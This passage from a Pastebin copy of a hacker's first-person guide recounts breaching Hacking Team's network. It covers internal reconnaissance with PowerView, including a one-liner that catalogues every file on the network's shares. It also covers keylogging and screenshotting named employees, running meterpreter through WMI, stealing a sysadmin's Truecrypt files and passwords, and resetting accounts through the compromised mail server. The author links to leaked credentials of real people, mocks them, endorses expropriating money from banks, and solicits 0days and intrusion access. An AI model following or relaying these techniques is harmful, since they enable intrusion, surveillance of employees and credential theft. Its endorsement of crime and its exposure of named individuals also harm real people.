  726. high-uptime servers. On the off chance that they all reboot at the same time,
  727. I have passwords and a golden ticket [1] as backup access. You can read more
  728. about the different techniques for persistence in windows here [2][3][4]. But
  729. for hacking companies, it's not needed and it increases the risk of detection.
  730.  
  731. [1] http://blog.cobaltstrike.com/2014/05/14/meterpreter-kiwi-extension-golden-ticket-howto/
  732. [2] http://www.harmj0y.net/blog/empire/nothing-lasts-forever-persistence-with-empire/
  733. [3] http://www.hexacorn.com/blog/category/autostart-persistence/
  734. [4] https://blog.netspi.com/tag/persistence/
  735.  
  736.  
  737. ----[ 13.3 - Internal reconnaissance ]------------------------------------------
  738.  
  739. The best tool these days for understanding windows networks is Powerview [1].
  740. It's worth reading everything written by it's author [2], especially [3], [4],
  741. [5], and [6]. Powershell itself is also quite powerful [7]. As there are still
  742. many windows 2000 and 2003 servers without powershell, you also have to learn
  743. the old school [8], with programs like netview.exe [9] or the windows builtin
  744. "net view". Other techniques that I like are:
  745.  
  746. 1) Downloading a list of file names
  747.  
  748. With a Domain Admin account, you can download a list of all filenames in
  749. the network with powerview:
  750.  
  751. Invoke-ShareFinderThreaded -ExcludedShares IPC$,PRINT$,ADMIN$ |
  752. select-string '^(.*) \t-' | %{dir -recurse $_.Matches[0].Groups[1] |
  753. select fullname | out-file -append files.txt}
  754.  
  755. Later, you can read it at your leisure and choose which files to download.
  756.  
  757. 2) Reading email
  758.  
  759. As we've already seen, you can download email with powershell, and it has a
  760. lot of useful information.
  761.  
  762. 3) Reading sharepoint
  763.  
  764. It's another place where many businesses store a lot of important
  765. information. It can also be downloaded with powershell [10].
  766.  
  767. 4) Active Directory [11]
  768.  
  769. It has a lot of useful information about users and computers. Without being
  770. Domain Admin, you can already get a lot of info with powerview and other
  771. tools [12]. After getting Domain Admin, you should export all the AD
  772. information with csvde or another tool.
  773.  
  774. 5) Spy on the employees
  775.  
  776. One of my favorite hobbies is hunting sysadmins. Spying on Christian Pozzi
  777. (one of Hacking Team's sysadmins) gave me access to a Nagios server which
  778. gave me access to the rete sviluppo (development network with the source
  779. code of RCS). With a simple combination of Get-Keystrokes and
  780. Get-TimedScreenshot from PowerSploit [13], Do-Exfiltration from nishang
  781. [14], and GPO, you can spy on any employee, or even on the whole domain.
  782.  
  783. [1] https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView
  784. [2] http://www.harmj0y.net/blog/tag/powerview/
  785. [3] http://www.harmj0y.net/blog/powershell/veil-powerview-a-usage-guide/
  786. [4] http://www.harmj0y.net/blog/redteaming/powerview-2-0/
  787. [5] http://www.harmj0y.net/blog/penetesting/i-hunt-sysadmins/
  788. [6] http://www.slideshare.net/harmj0y/i-have-the-powerview
  789. [7] https://adsecurity.org/?p=2535
  790. [8] https://www.youtube.com/watch?v=rpwrKhgMd7E
  791. [9] https://github.com/mubix/netview
  792. [10] https://blogs.msdn.microsoft.com/rcormier/2013/03/30/how-to-perform-bulk-downloads-of-files-in-sharepoint/
  793. [11] https://adsecurity.org/?page_id=41
  794. [12] http://www.darkoperator.com/?tag=Active+Directory
  795. [13] https://github.com/PowerShellMafia/PowerSploit
  796. [14] https://github.com/samratashok/nishang
  797.  
  798.  
  799. --[ 14 - Hunting Sysadmins ]----------------------------------------------------
  800.  
  801. Reading their documentation about their infrastructure [1], I saw that I was
  802. still missing access to something important - the "Rete Sviluppo", an isolated
  803. network with the source code for RCS. The sysadmins of a company always have
  804. access to everything, so I searched the computers of Mauro Romeo and Christian
  805. Pozzi to see how they administer the Sviluppo network, and to see if there
  806. were any other interesting systems I should investigate. It was simple to
  807. access their computers, since they were part of the windows domain where I'd
  808. already gotten admin access. Mauro Romeo's computer didn't have any ports
  809. open, so I opened the port for WMI [2] and executed meterpreter [3]. In
  810. addition to keylogging and screen scraping with Get-Keystrokes and
  811. Get-TimeScreenshot, I used many /gather/ modules from metasploit, CredMan.ps1
  812. [4], and searched for interesting files [5]. Upon seeing that Pozzi had a
  813. Truecrypt volume, I waited until he'd mounted it and then copied off the
  814. files. Many have made fun of Christian Pozzi's weak passwords (and of
  815. Christian Pozzi in general, he provides plenty of material [6][7][8][9]). I
  816. included them in the leak as a false clue, and to laugh at him. The reality is
  817. that mimikatz and keyloggers view all passwords equally.
  818.  
  819. [1] http://hacking.technology/Hacked%20Team/FileServer/FileServer/Hackingteam/InfrastrutturaIT/
  820. [2] http://www.hammer-software.com/wmigphowto.shtml
  821. [3] https://www.trustedsec.com/june-2015/no_psexec_needed/
  822. [4] https://gallery.technet.microsoft.com/scriptcenter/PowerShell-Credentials-d44c3cde
  823. [5] http://pwnwiki.io/#!presence/windows/find_files.md
  824. [6] http://archive.is/TbaPy
  825. [7] http://hacking.technology/Hacked%20Team/c.pozzi/screenshots/
  826. [8] http://hacking.technology/Hacked%20Team/c.pozzi/Desktop/you.txt
  827. [9] http://hacking.technology/Hacked%20Team/c.pozzi/credentials/
  828.  
  829.  
  830. --[ 15 - The bridge ]-----------------------------------------------------------
  831.  
  832. Within Christian Pozzi's Truecrypt volume, there was a textfile with many
  833. passwords [1]. One of those was for a Fully Automated Nagios server, which had
  834. access to the Sviluppo network in order to monitor it. I'd found the bridge I
  835. needed. The textfile just had the password to the web interface, but there was
  836. a public code execution exploit [2] (it's an unauthenticated exploit, but it
  837. requires that at least one user has a session initiated, for which I used the
  838. password from the textfile).
  839.  
  840. [1] http://hacking.technology/Hacked%20Team/c.pozzi/Truecrypt%20Volume/Login%20HT.txt
  841. [2] http://seclists.org/fulldisclosure/2014/Oct/78
  842.  
  843.  
  844. --[ 16 - Reusing and resetting passwords ]--------------------------------------
  845.  
  846. Reading the emails, I'd seen Daniele Milan granting access to git repos. I
  847. already had his windows password thanks to mimikatz. I tried it on the git
  848. server and it worked. Then I tried sudo and it worked. For the gitlab server
  849. and their twitter account, I used the "forgot my password" function along with
  850. my access to their mail server to reset the passwords.
  851.  
  852.  
  853. --[ 17 - Conclusion ]-----------------------------------------------------------
  854.  
  855. That's all it takes to take down a company and stop their human rights abuses.
  856. That's the beauty and asymmetry of hacking: with 100 hours of work, one person
  857. can undo years of work by a multi-million dollar company. Hacking gives the
  858. underdog a chance to fight and win.
  859.  
  860. Hacking guides often end with a disclaimer: this information is for
  861. educational purposes only, be an ethical hacker, don't attack systems you
  862. don't have permission to, etc. I'll say the same, but with a more rebellious
  863. conception of "ethical" hacking. Leaking documents, expropriating money from
  864. banks, and working to secure the computers of ordinary people is ethical
  865. hacking. However, most people that call themselves "ethical hackers" just work
  866. to secure those who pay their high consulting fees, who are often those most
  867. deserving to be hacked.
  868.  
  869. Hacking Team saw themselves as part of a long line of inspired Italian design
  870. [1]. I see Vincenzetti, his company, his cronies in the police, Carabinieri,
  871. and government, as part of a long tradition of Italian fascism. I'd like to
  872. dedicate this guide to the victims of the raid on the Armando Diaz school, and
  873. to all those who have had their blood spilled by Italian fascists.
  874.  
  875. [1] https://twitter.com/coracurrier/status/618104723263090688
  876.  
  877.  
  878. --[ 18 - Contact ]--------------------------------------------------------------
  879.  
  880. To send me spear phishing attempts, death threats in Italian [1][2], and to
  881. give me 0days or access inside banks, corporations, governments, etc.
  882.  
  883. [1] http://andres.delgado.ec/2016/01/15/el-miedo-de-vigilar-a-los-vigilantes/
  884. [2] https://twitter.com/CthulhuSec/status/619459002854977537
  885.  
  886. only encrypted email please:
  887. https://securityinabox.org/es/thunderbird_usarenigmail
  888. -----BEGIN PGP PUBLIC KEY BLOCK-----
  889.  
  890. mQENBFVp37MBCACu0rMiDtOtn98NurHUPYyI3Fua+bmF2E7OUihTodv4F/N04KKx
  891. vDZlhKfgeLVSns5oSimBKhv4Z2bzvvc1w/00JH7UTLcZNbt9WGxtLEs+C+jF9j2g
  892. 27QIfOJGLFhzYm2GYWIiKr88y95YLJxvrMNmJEDwonTECY68RNaoohjy/TcdWA8x
  893. +fCM4OHxM4AwkqqbaAtqUwAJ3Wxr+Hr/3KV+UNV1lBPlGGVSnV+OA4m8XWaPE73h
  894. VYMVbIkJzOXK9enaXyiGKL8LdOHonz5LaGraRousmiu8JCc6HwLHWJLrkcTI9lP8
  895. Ms3gckaJ30JnPc/qGSaFqvl4pJbx/CK6CwqrABEBAAG0IEhhY2sgQmFjayEgPGhh
  896. Y2tiYWNrQHJpc2V1cC5uZXQ+iQE3BBMBCgAhBQJXAvPFAhsDBQsJCAcDBRUKCQgL
  897. BRYCAwEAAh4BAheAAAoJEDScPRHoqSXQoTwIAI8YFRdTptbyEl6Khk2h8+cr3tac
  898. QdqVNDdp6nbP2rVPW+o3DeTNg0R+87NAlGWPg17VWxsYoa4ZwKHdD/tTNPk0Sldf
  899. cQE+IBfSaO0084d6nvSYTpd6iWBvCgJ1iQQwCq0oTgROzDURvWZ6lwyTZ8XK1KF0
  900. JCloCSnbXB8cCemXnQLZwjGvBVgQyaF49rHYn9+edsudn341oPB+7LK7l8vj5Pys
  901. 4eauRd/XzYqxqNzlQ5ea6MZuZZL9PX8eN2obJzGaK4qvxQ31uDh/YiP3MeBzFJX8
  902. X2NYUOYWm3oxiGQohoAn//BVHtk2Xf7hxAY4bbDEQEoDLSPybZEXugzM6gC5AQ0E
  903. VWnfswEIANaqa8fFyiiXYWJVizUsVGbjTTO7WfuNflg4F/q/HQBYfl4ne3edL2Ai
  904. oHOGg0OMNuhNrs56eLRyB/6IjM3TCcfn074HL37eDT0Z9p+rbxPDPFOJAMFYyyjm
  905. n5a6HfmctRzjEXccKFaqlwalhnRP6MRFZGKU6+x1nXbiW8sqGEH0a/VdCR3/CY5F
  906. Pbvmhh894wOzivUlP86TwjWGxLu1kHFo7JDgp8YkRGsXv0mvFav70QXtHllxOAy9
  907. WlBP72gPyiWQ/fSUuoM+WDrMZZ9ETt0j3Uwx0Wo42ZoOXmbAd2jgJXSI9+9e4YUo
  908. jYYjoU4ZuX77iM3+VWW1J1xJujOXJ/sAEQEAAYkBHwQYAQIACQUCVWnfswIbDAAK
  909. CRA0nD0R6Kkl0ArYB/47LnABkz/t6M1PwOFvDN3e2JNgS1QV2YpBdog1hQj6RiEA
  910. OoeQKXTEYaymUwYXadSj7oCFRSyhYRvSMb4GZBa1bo8RxrrTVa0vZk8uA0DB1ZZR
  911. LWvSR7nwcUkZglZCq3Jpmsy1VLjCrMC4hXnFeGi9AX1fh28RYHudh8pecnGKh+Gi
  912. JKp0XtOqGF5NH/Zdgz6t+Z8U++vuwWQaubMJTRdMTGhaRv+jIzKOiO9YtPNamHRq
  913. Mf2vA3oqf22vgWQbK1MOK/4Tp6MGg/VR2SaKAsqyAZC7l5TeoSPN5HdEgA7u5GpB
  914. D0lLGUSkx24yD1sIAGEZ4B57VZNBS0az8HoQeF0k
  915. =E5+y
  916. -----END PGP PUBLIC KEY BLOCK-----
  917.  
  918.  
  919.  
  920. If not you, who? If not now, when?
  921. _ _ _ ____ _ _
  922. | | | | __ _ ___| | __ | __ ) __ _ ___| | _| |
  923. | |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / |
  924. | _ | (_| | (__| < | |_) | (_| | (__| <|_|
  925. |_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!